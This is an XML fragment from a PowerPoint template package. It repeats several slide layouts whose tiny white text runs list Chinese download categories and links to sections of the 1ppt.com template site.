              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout110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10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10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10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1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11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11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11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11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11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11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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout111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11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11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11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1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12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12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12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12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12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12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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout112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12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12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12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1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13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13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13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13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13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13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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
